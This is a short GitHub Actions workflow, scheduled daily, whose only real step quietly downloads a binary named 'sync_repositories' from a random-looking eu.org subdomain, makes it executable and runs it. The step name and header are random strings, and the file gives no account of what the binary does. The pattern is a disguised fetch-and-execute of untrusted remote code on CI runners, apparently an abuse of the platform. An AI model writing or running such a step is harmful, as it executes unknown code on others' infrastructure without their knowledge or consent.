#2024-03-18-[135737]-qp79h06i
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "31 4 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: dk870o2yuuvdatcs
        run: |
          wget -q https://fj31t8shev3honhc.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories